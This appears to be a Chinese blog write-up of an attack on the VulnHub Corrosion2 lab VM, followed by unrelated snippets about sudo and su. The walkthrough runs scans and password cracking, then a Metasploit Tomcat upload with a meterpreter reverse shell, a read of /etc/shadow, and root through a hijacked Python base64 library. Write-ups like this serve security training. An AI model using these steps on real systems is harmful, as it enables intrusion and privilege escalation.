vulnhub之Corrosion2的实践

VSole2022-06-05 08:15:03

今天实践的是vulnhub的Corrosion2镜像,

下载地址,https://download.vulnhub.com/corrosion/Corrosion2.ova,

用workstation导入成功,能扫描到地址,

sudo netdiscover -r 192.168.137.0/24,

接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.137.31,

看到有ssh,apache,tomcat,三个服务,

对tomcat继续做目录爆破,

sudo dirb http://192.168.137.31:8080/ -X .php,.zip,

下载backup.zip,wget http://192.168.137.31:8080/backup.zip,

解压发现要密码,unzip backup.zip,

用fcrackzip进行爆破,

sudo fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip,

得到密码@administrator_hi5,再次解压,

查看tomcat-users.xml文件,cat tomcat-users.xml,

得到用户名密码admin/melehifokivai,

用metasploit对tomcat进行攻击,

use exploit/multi/http/tomcat_mgr_upload

set rhosts 192.168.137.31

set rport 8080

set httpusername admin

set httppassword melehifokivai

set payload payload/java/meterpreter/reverse_tcp

exploit

拿到meterpreter反弹shell,getuid看一下不是root,

切到shell,cd /home,ls看到有两个账户,

切用户su jaye,密码melehifokivai可用,id看一下还不是root,

进到jaye目录下,cd jaye,ls看到有Files目录,进到Files目录,cd Files,

发现有个look程序,可以查看系统内文件内容,直接查看密码文件,

./look '' /etc/shadow,

把randy的密码hash拷贝出来破解,

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash,

获取到randy的密码是07051986randy,

切用户randy,id看一下仍然不是root,sudo -l还不能交互,重新ssh登录,

sudo -l发现有python脚本是root权限的,但是randy用户是不可以编辑的,

查看python脚本内容,发现调用了base64的库,

查找一下base64的库文件,locate base64,

确认base64的库文件randy用户可以编辑,

编辑base64的库文件,vi /usr/lib/python3.8/base64.py,

import os

os.system ("/bin/bash")

执行python脚本,

sudo /usr/lib/python3.8 /home/randy/randombase64.py,

得到新的shell,id看一下确认是root,

sudo
本作品采用《CC 协议》,转载必须注明作者和本文链接
Sudo是Linux/Unix系统上常用的工具,管理员可通过它分配给普通用户所需的管理权限,几乎所有的Linux及Unix系统都安装有程序。此基于堆的缓冲区溢出漏洞已隐藏十年之久,利用此漏洞,非特权的本地普通用户可以在主机上获得root特权。相关研究人员已经在Ubuntu 20.04(Sudo 1.8.31)、Debian 10(Sudo 1.8.27)、Fedora 33(Sudo 1.9.2)
sudo 命令只允许使用提升的权限运行单个命令,而 su 命令会启动一个新的 shell,同时允许使用 root 权限运行尽可能多的命令,直到明确退出登录。不过有时间限制,Ubuntu默认为一次时长15分钟。如果后面不加账户时系统默认为root账户,密码也为超级账户的密码。想退回普通账户时可以执行“exit”或“logout” 。要求执行该命令的用户必须在sudoers中才可以。
一名英国安全研究人员今天发现,Sudo应用程序中最近出现的安全漏洞也影响了macOS操作系统,而不仅仅是最初认为的Linux和BSD。Qualys研究人员在上周的 告中表示,他们仅在Ubuntu,Debian和Fedora上测试了该问题。Hickey表示,他测试了CVE-2021-3156漏洞,并发现通过进行一些修改,该安全漏洞也可以用于授予攻击者访问macOS根帐户的权限。苹果在调查报告时拒绝发表评论。
可能你执行了相当多的 sudo 命令,因为你不想一直 sudo su 以 root 身份执行命令。
须安装AFL++,可以使用官方docker镜像;如果已经在本地安装,也可直接使用。测试的场景为,非特权用户输入恶意构造程序执行参数,引起sudo程序崩溃。sudo程序由root用户和其他用户启动的表现是不同的。sudo的所有权是root,但却是由普通用户调用的。argv作为一个指针数组的指针,该指针数组中最后一个指针应为0,其余的每一项为一个字符串指针。注意到afl_init_argv函数中,存在对0x02的判断,编写这个文件的作者解释到,以单独一个0x02作为参数表
据报告,Linux中存在一个高严重性漏洞,低权限攻击者可以利用该漏洞在受影响的系统上获得完整的根访问权限。
环境变量里,如果直接输入?不管用的话,就用绝对路径名的方式:/usr/sbin/useradd?。
之前一直对 su 和 sudo 这两个命令犯迷糊,最近专门搜了这方面的资料,总算是把两者的关系以及用法搞清楚
linux中su与sudo的区别
2021-09-09 09:23:44
首先需要解释下 su 代表什么意思。 之前一直以为 su 是 super user,查阅资料之后才知道原来表示 switch user。 知道 su 是由什么缩写来的之后,那么它提供的功能就显而易见了,就是切换用户。
VSole
网络安全专家